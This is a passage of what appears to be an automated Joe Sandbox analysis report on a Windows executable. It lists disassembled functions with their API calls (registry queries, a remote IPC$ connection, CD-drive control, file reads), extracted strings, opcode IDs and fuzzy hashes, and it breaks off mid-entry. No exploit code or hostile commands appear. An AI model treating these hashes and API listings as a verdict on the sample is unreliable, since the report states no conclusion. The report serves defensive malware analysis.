                                                                                                                            • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                                                            Function 0046F90E Relevance: 21.1, APIs: 14, Instructions: 147windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                                                                            • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                                                                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                                                                            • DeleteObject.GDI32(?), ref: 0046F950
                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                                                                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                                                                            • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                                                                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                                                                            • DeleteObject.GDI32(?), ref: 0046FA68
                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3412594756-0
                                                                                                                            • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                            • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                                                            • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                            • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                                                            Function 0045D971 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 140COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                            • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                            • API String ID: 4013263488-4113822522
                                                                                                                            • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                            • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                                                            • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                            • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                                                            Function 00435A35 Relevance: 21.1, APIs: 14, Instructions: 136timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 228034949-0
                                                                                                                            • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                            • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                                                                            • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                            • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                                                                            Function 004334CA Relevance: 21.1, APIs: 14, Instructions: 132filecommemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                                                            • DeleteObject.GDI32(?), ref: 00433603
                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3969911579-0
                                                                                                                            • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                            • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                                                            • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                            • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                                                            Function 00445A77 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 73windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32 ref: 00445A8D
                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                                                            • __wcsicoll.LIBCMT ref: 00445AC4
                                                                                                                            • __wcsicoll.LIBCMT ref: 00445AE0
                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                            • API String ID: 3125838495-3381328864
                                                                                                                            • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                            • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                                                            • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                            • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                                                            Function 00479921 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 314COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CopyVariant$ErrorLast
                                                                                                                            • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                                                            • API String ID: 2286883814-4206948668
                                                                                                                            • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                            • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                                                            • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                            • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                                                            Function 00475D8B Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 194COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                            • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                                                            • _wcscpy.LIBCMT ref: 00475F18
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                            • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                                                            • API String ID: 3052893215-4176887700
                                                                                                                            • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                            • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                                                                            • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                            • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                                                                            Function 004582BF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                                                            • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                                                            • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                                                            • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                                                              • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                                                            • String ID: Version$\TypeLib$interface\
                                                                                                                            • API String ID: 656856066-939221531
                                                                                                                            • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                            • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                                                            • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                            • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                                                            Function 0045E62E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 155COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                                                            • __swprintf.LIBCMT ref: 0045E6EE
                                                                                                                            • _printf.LIBCMT ref: 0045E7A9
                                                                                                                            • _printf.LIBCMT ref: 0045E7D2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                            • API String ID: 3590180749-2354261254
                                                                                                                            • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                            • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                                                            • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                            • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                                                            Function 00452E2A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 154COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                            • String ID: %.15g$0x%p$False$True
                                                                                                                            • API String ID: 3038501623-2263619337
                                                                                                                            • Opcode ID: 490d1d685d88e4ac692614f7c2a0757cb870c57d15913fa8f64f937dd46f6444
                                                                                                                            • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                                                                            • Opcode Fuzzy Hash: 490d1d685d88e4ac692614f7c2a0757cb870c57d15913fa8f64f937dd46f6444
                                                                                                                            • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                                                                            Function 004580E1 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 136registryshareCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • _memset.LIBCMT ref: 00458194
                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                            • API String ID: 2255324689-22481851
                                                                                                                            • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                            • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                                            • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                            • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                                                            Function 004584D6 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 105registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                                                            • __wcsicoll.LIBCMT ref: 004585D6
                                                                                                                            • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                                                            • String ID: ($interface$interface\
                                                                                                                            • API String ID: 2231185022-3327702407
                                                                                                                            • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                            • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                                                            • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                            • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                                                            Function 00436582 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 79networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
